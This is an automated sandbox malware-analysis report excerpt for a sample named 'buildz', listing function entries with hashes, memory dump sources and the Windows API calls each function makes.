                          • Instruction ID: 6aa206bc51abb1e4e00f77e093730f73406de48d97d57b616f8992e5249ca511
                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                          • Instruction Fuzzy Hash: 4F113F79A40208EFDB01DF98CA85E9DBBF5AF08350F0580A4F9489B361D375EA50DF80

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 126 49d9d0-49d9e3 LocalAlloc
                          APIs
                          • LocalAlloc.KERNELBASE(00000000,0049DDEC), ref: 0049D9D8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097151386.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2097082680.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097348844.000000000049E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097366037.00000000004A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097398498.0000000000531000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_buildz.jbxd
                          Similarity
                          • API ID: AllocLocal
                          • String ID:
                          • API String ID: 3494564517-0
                          • Opcode ID: 4339bda432d7bb27f0efc9bcf5546ca79dff115912f57ecd99623989879e5092
                          • Instruction ID: ff70f194fafbc4afd29c0ac007c53455f33a39f59e8a48a719e16423faf19035
                          • Opcode Fuzzy Hash: 4339bda432d7bb27f0efc9bcf5546ca79dff115912f57ecd99623989879e5092
                          • Instruction Fuzzy Hash: 41B01270100200CFC7108F91BD057183F60BB35302F004821E10454172E7740019BF01
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset$_free_malloc_strstr$_wcsstr
                          • String ID: "
                          • API String ID: 430003804-123907689
                          • Opcode ID: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                          • Instruction ID: 26a907d8fe2398e8157941837038a0c94e05e505944b0811ade1293559cc1215
                          • Opcode Fuzzy Hash: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                          • Instruction Fuzzy Hash: 2742D171508390ABD721DF24DC48B9BBBF9BF85308F04092DF98997191DB75E609CBA2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                          • Instruction ID: 4feb7346bc1d71c8195667deec0062a3c0da290a9486f5769ca7da72d415a25f
                          • Opcode Fuzzy Hash: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                          • Instruction Fuzzy Hash: BE527F71D10228DBDF25DFA8C885BEEBBB5BF24308F108169D419A7250E735AA4DCF91
                          APIs
                          • _wcsstr.LIBCMT ref: 0231E72D
                          • _wcsstr.LIBCMT ref: 0231E756
                          • _memset.LIBCMT ref: 0231E784
                            • Part of subcall function 0235FC0C: std::exception::exception.LIBCMT ref: 0235FC1F
                            • Part of subcall function 0235FC0C: __CxxThrowException@8.LIBCMT ref: 0235FC34
                            • Part of subcall function 0235FC0C: std::exception::exception.LIBCMT ref: 0235FC4D
                            • Part of subcall function 0235FC0C: __CxxThrowException@8.LIBCMT ref: 0235FC62
                            • Part of subcall function 0235FC0C: std::regex_error::regex_error.LIBCPMT ref: 0235FC74
                            • Part of subcall function 0235FC0C: __CxxThrowException@8.LIBCMT ref: 0235FC82
                            • Part of subcall function 0235FC0C: std::exception::exception.LIBCMT ref: 0235FC9B
                            • Part of subcall function 0235FC0C: __CxxThrowException@8.LIBCMT ref: 0235FCB0
                          • _wcsstr.LIBCMT ref: 0231EA0C
                          • _memset.LIBCMT ref: 0231EE5C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throw$_wcsstrstd::exception::exception$_memset$std::regex_error::regex_error
                          • String ID:
                          • API String ID: 1338678108-0
                          • Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                          • Instruction ID: 6908b27b09287d212cc26fbf0d0c95751a4e510b0b1498b88c265888909ff66f
                          • Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                          • Instruction Fuzzy Hash: A552BD71E003199FDF28CF68C894BAEBBF5BF44304F148569E846AB281D7729A45CF91
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 0040154E
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00401563
                          • UnhandledExceptionFilter.KERNEL32(0049E1A0), ref: 0040156E
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0040158A
                          • TerminateProcess.KERNEL32(00000000), ref: 00401591
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097151386.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2097082680.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097348844.000000000049E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097366037.00000000004A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097398498.0000000000531000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_buildz.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: 06323a67156c3eee6a84a18d3e8723d5b3af86dd9c559d0bb68fa09d7cf96f3e
                          • Instruction ID: 52fdd6fe186573a9facddd346b9e125a130b63425b0dc8b86c689f4d2c566d34
                          • Opcode Fuzzy Hash: 06323a67156c3eee6a84a18d3e8723d5b3af86dd9c559d0bb68fa09d7cf96f3e
                          • Instruction Fuzzy Hash: 4221E4B4602208DBD701EF2AFE496553FE8BB5A704F00453AE908976B0E3F45680EF4D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                          • Instruction ID: dba0befeb1e4258ac6fd93bdb1cba6ae8b1fdc60e979c556c8f6c8d4fbbdf37f
                          • Opcode Fuzzy Hash: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                          • Instruction Fuzzy Hash: 3142AE71D10228DBDF24DFA4C984BEEB7F6BF14308F204169D419A7291E731AA49CFA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                          • Instruction ID: 5f0398589cc7455c0491326b34f8896bcf99bd6a5af834443064d8e11ae4b2b0
                          • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                          • Instruction Fuzzy Hash: 57527370E00259DFDB14DFA4C844FAEBBB9BF49704F148598E905AB291DB31AD46CFA0
                          APIs
                          • GetNumaProcessorNode.KERNEL32(00000000,00000000), ref: 0049DB91
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0049DB99
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097151386.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2097082680.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097348844.000000000049E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097366037.00000000004A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097398498.0000000000531000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_buildz.jbxd
                          Similarity
                          • API ID: ExceptionFilterNodeNumaProcessorUnhandled
                          • String ID:
                          • API String ID: 339451861-0
                          • Opcode ID: 9ccd4f8c3cb0e18a4e9bafbef31990256f470bf55fa0c6b400edd371d617d456
                          • Instruction ID: 86b2a0ec293f9e93e608e4e6684777d49320b076966fd7be11d30511f63aa347
                          • Opcode Fuzzy Hash: 9ccd4f8c3cb0e18a4e9bafbef31990256f470bf55fa0c6b400edd371d617d456
                          • Instruction Fuzzy Hash: D2F0DC30D00214EBDF20DB3ECC0174D3F20AF14725F024235E450AA1D2C6346D00D744
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $
                          • API String ID: 0-3993045852
                          • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                          • Instruction ID: 87f982f6e80786b32369b0afb5fc98320b633e5f4e0f02ea99875be620b967da
                          • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                          • Instruction Fuzzy Hash: F63253B1E0062DAADF619F64CC44BAFB7B9FF45704F0041EAEA0CA6151DB748A80CF59
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(Function_00004AC0), ref: 00404B07
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097151386.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2097082680.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097348844.000000000049E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097366037.00000000004A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097398498.0000000000531000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_buildz.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 8a2d52c449bddeff512ab11631da4370bc9188bece72f9d083fa932cf4d3afae
                          • Instruction ID: 05fa9dc60bc38e365fedbba693aa8dc54d42a75b06a93b8be27f4f57b718d6a5
                          • Opcode Fuzzy Hash: 8a2d52c449bddeff512ab11631da4370bc9188bece72f9d083fa932cf4d3afae
                          • Instruction Fuzzy Hash: 3E9002A03B6510C6864067B1AC4D60925A06AD87467551972E102D4094DAA44110591D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                          • Instruction ID: 6f676ac1371da27c039ee8635704021398be16ed4556ea8050f394cd33717d94
                          • Opcode Fuzzy Hash: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                          • Instruction Fuzzy Hash: 1D42B071629F158BC3DADF24C88055BF3E1FFC8218F048A1DD99997A90DB38F819CA91
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                          • Instruction ID: 2991d0649f6b4987977e7ab62ce9731238ca9f261328d70a39588117c5728ce6
                          • Opcode Fuzzy Hash: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                          • Instruction Fuzzy Hash: 6122D076905B128FC714CF19D08065AF7E1FF88324F558A6EE8A9A7B10D730BA55CF81
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                          • Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
                          • Opcode Fuzzy Hash: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                          • Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
                          • Instruction ID: 6a4b03f266cca6584ff1d4f9743fc8753c9addc2f1a0cae9ffb7e64e062938e7
                          • Opcode Fuzzy Hash: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
                          • Instruction Fuzzy Hash: 55028D711187058FC756EE1CD49035AF3E2FFC8309F19892CD68987B64E739A9198F82
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                          • Instruction ID: ad222533a92c5f91dae717c3bd44f1c2689e6350401d7dc39a835a621e9b9bbe
                          • Opcode Fuzzy Hash: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                          • Instruction Fuzzy Hash: D8C12833E2477906D764DEAE8C500AAB6E3AFC4220F9B477DDDD4A7242C9306D4A86C0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                          • Instruction ID: 3700185dc497250e371778373ec6f815f5046d27faafe0ef8ada04247833b4cb
                          • Opcode Fuzzy Hash: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                          • Instruction Fuzzy Hash: A8A1DA0A8090E4ABEF455A7E90B63EBAFE9CB27354E76719284D85B793C019120FDF50
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                          • Instruction ID: 47aeaaac46cadc797a226e4c34e547b17c64e59c69488b17d9ed8be6dbaff1af
                          • Opcode Fuzzy Hash: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                          • Instruction Fuzzy Hash: 3DB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                          • Instruction ID: 59990f0628a8eb8c8381896f52893fa9ae6432ddadf34db8dd7f228244cba866
                          • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                          • Instruction Fuzzy Hash: 2AC1ACB5E003199FCB54CFA9C881ADEFBF0FF48200F24956AE919E7301E334AA458B55
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
                          • Instruction ID: 7ac1a0373762550ef3c10e4d64097df7f442db308e9d0478fc7d19a45bd3b99b
                          • Opcode Fuzzy Hash: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
                          • Instruction Fuzzy Hash: 25B18460039FA686CBD3FF30911028BF7E0BFC525DF44194AD59986864EB3EE94E9215
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
                          • Instruction ID: 4a91a77233e091a46bc269d68f3cadb61ec70517a7e28ea3eec920a43f93cec8
                          • Opcode Fuzzy Hash: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
                          • Instruction Fuzzy Hash: E19114739187BA06D7609EAE8C441B9B6E3AFC4210F9B077ADD9467282C9309E0697D0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                          • Instruction ID: d4011b94064ae28acb431647e31e7e68f051511984bf3491fd05e2e7af398923
                          • Opcode Fuzzy Hash: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                          • Instruction Fuzzy Hash: BFB17AB5E002199FCB84CFE9C885ADEFBF0FF48210F64916AD919E7301E334AA558B54
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
                          • Instruction ID: 34cfac34d43cd02fc62c5e4cc9f823deae5f795d43151432a0f32150a2b46f97
                          • Opcode Fuzzy Hash: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
                          • Instruction Fuzzy Hash: 1171D473A20B254B8318DEB98D94192F2F1EF88610B57C27CCE84D7B45EB31B95A96C0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
                          • Instruction ID: e4dea96f6af27e3a4b46ddb03475c43f34eb5126c932dba09d3f3a5464f3f851
                          • Opcode Fuzzy Hash: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
                          • Instruction Fuzzy Hash: 668137B2A047019FC328CF19D88566AF7E1FFD8210F15892DE99E83B41D770F8558B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
                          • Instruction ID: 1accbe7ad59c640fa30aa509ef39c30447654319c7796e524f5e662ab1b38864
                          • Opcode Fuzzy Hash: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
                          • Instruction Fuzzy Hash: C7710622535B7A0AEBC3DA3D881046BF7D0BE4910AB850956DCD0F3181D72EDE4E77A4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
                          • Instruction ID: c4156457c7782ff9b85653d1ab3d713b35f40fc7d597b464f4dfa9f379c672f0
                          • Opcode Fuzzy Hash: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
                          • Instruction Fuzzy Hash: 32815775A10B669BD718CF2AD8C046AFBF1FF08211B518A2ADCA583B41D334F565CFA0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                          • Instruction ID: 8721becd3284139286ce6c866e299e13d98579a49fd6ac95877fb3ea357c3168
                          • Opcode Fuzzy Hash: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                          • Instruction Fuzzy Hash: 3161A3339046BB5BDB649E6DD8401A9B7A2BFC4310F5B8A75DC9823642C234EA11DBD0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                          • Instruction ID: 98e324909444e03c8f633416fbbca4f1391c7620686807eb4479c4489e871332
                          • Opcode Fuzzy Hash: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                          • Instruction Fuzzy Hash: BF617C3791262B9BD761DF59D84527AB3A2EFC4360F6B8A358C0427642C734F9119BC4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                          • Instruction ID: 46b21f79b1504218c56eab350fd596687513c9780240e5219deabfc73c48a441
                          • Opcode Fuzzy Hash: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                          • Instruction Fuzzy Hash: AA51DD229257B945EBC3DA3D88504BEBBE0BE49106B460557DCD0B3181C72EDE4DB7E4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                          • Instruction ID: f0ef39fb87bbcbabf7c087ccc32622f448b38fccad3fa450d398332d7bff4148
                          • Opcode Fuzzy Hash: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                          • Instruction Fuzzy Hash: C4417C72E1872E47E34CFE169C9421AB39397C0250F4A8B3CCE5A973C1DA35B926C6C1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097760576.0000000000A2C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A2C000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a2c000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                          • Instruction ID: 1a1f9f54017444b12237a1fe6e313fedee023fb46fa4a9ac0671362521b25f03
                          • Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                          • Instruction Fuzzy Hash: D03167398062919FCB15CF78E890AB5BB70EF97324F1885ECC0C18B107E33AA04AC794
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                          • Instruction ID: 0490d86b4bce045c3c4fd50df124024f9d30e3e971c92668636fd4ef92e6cccb
                          • Opcode Fuzzy Hash: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                          • Instruction Fuzzy Hash: 40315E7682976A4FC3D3FE61894010AF291FFC5118F4D4B6CCD505B690D73EAA4A9A82
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                          • Instruction ID: e69421fdde74a9427e01166e821be9981680b2f13122cdfe8858d9eb4a9336be
                          • Opcode Fuzzy Hash: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                          • Instruction Fuzzy Hash: 543112306283459FD755EF29C880A4BFBE1FFC8258F05D919F9889B221D730E985CA62
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
